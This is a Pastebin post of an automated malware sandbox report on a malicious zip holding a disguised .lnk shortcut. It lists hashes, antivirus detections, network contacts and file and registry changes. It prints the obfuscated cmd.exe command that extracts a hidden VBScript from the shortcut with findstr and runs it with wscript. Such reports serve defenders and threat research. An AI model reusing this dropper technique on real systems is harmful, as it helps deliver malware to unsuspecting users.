Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Winlnk"
- * MalScore: 2.3499999999999996
- * File Name: "Zips_7df177b164c352ceccdab988a7ee255d.zip"
- * File Size: 3359
- * File Type: "Zip archive data, at least v2.0 to extract"
- * SHA256: "2b8ca80ca776c90f02c90fd7e5f55fb29a756357bd9f55c432ab81cf65c22d5a"
- * MD5: "7df177b164c352ceccdab988a7ee255d"
- * SHA1: "bdfbabb0bc32ed7c40c0c0256bbf3f9a11d57bb7"
- * SHA512: "e1c1f76a0557276240fcdd3abe4ed21ea68600da0dad3ae7b82daa38e30c0382ce035aee110e62f35bb65ca80beb7c4adf569ef5619d3934817e7e4965fbb8a4"
- * CRC32: "C7791FC4"
- * SSDEEP: "96:d0+jowvJn7Dc+Anwas6MmgFIlCc6tUMadOy+x1pf6QGJ+Oq/:d0+jJnncNUFI9vMOZQXCK/"
- * Process Execution:
- "cmd.exe",
- "cmd.exe",
- "findstr.exe",
- "wscript.exe"
- * Executed Commands:
- "\"C:\\Windows\\System32\\cmd.exe\" /v:on /c seuhv & set \"gLZKl=inds\" & (f!gLZKl!tr \"dfPWo.*\" Label_83803.txt.lnk > \"C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs\" & \"C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs\") & cECVU",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Label_83803.txt.lnk ",
- "findstr \"dfPWo.*\" Label_83803.txt.lnk",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs\"",
- "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs "
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (3 unique times)",
- "Details":
- "IP": "13.107.4.50:80"
- "IP": "70.40.217.200:443"
- "IP": "192.35.177.64:80"
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 1028, offset: 0x00018640, length: 0x00000012"
- "Description": "File has been identified by 5 Antiviruses on VirusTotal as malicious",
- "Details":
- "Kaspersky": "HEUR:Trojan.WinLNK.Agent.gen"
- "ZoneAlarm": "HEUR:Trojan.WinLNK.Agent.gen"
- "VBA32": "Trojan.Link.DoubleRun"
- "Zoner": "Probably LNKScript"
- "Rising": "Trojan.Obfus/VBS!1.B96F (CLASSIC)"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- * Started Service:
- * Mutexes:
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab693A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar693B.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab699A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar699B.tmp",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab6B42.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar6B43.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab693A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar693B.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab699A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar699B.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab6B42.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar6B43.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CWnfn.vbs"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "yulitours.com",
- "answers":
- "data": "70.40.217.200",
- "type": "A"
- "type": "A",
- "request": "apps.identrust.com",
- "answers":
- "data": "192.35.177.64",
- "type": "A"
- "data": "apps.digsigtrust.com",
- "type": "CNAME"
- * Domains:
- "ip": "70.40.217.200",
- "domain": "yulitours.com"
- "ip": "192.35.177.64",
- "domain": "apps.identrust.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "apps.identrust.com",
- "version": "1.1",
- "path": "/roots/dstrootcax3.p7c",
- "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86403\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment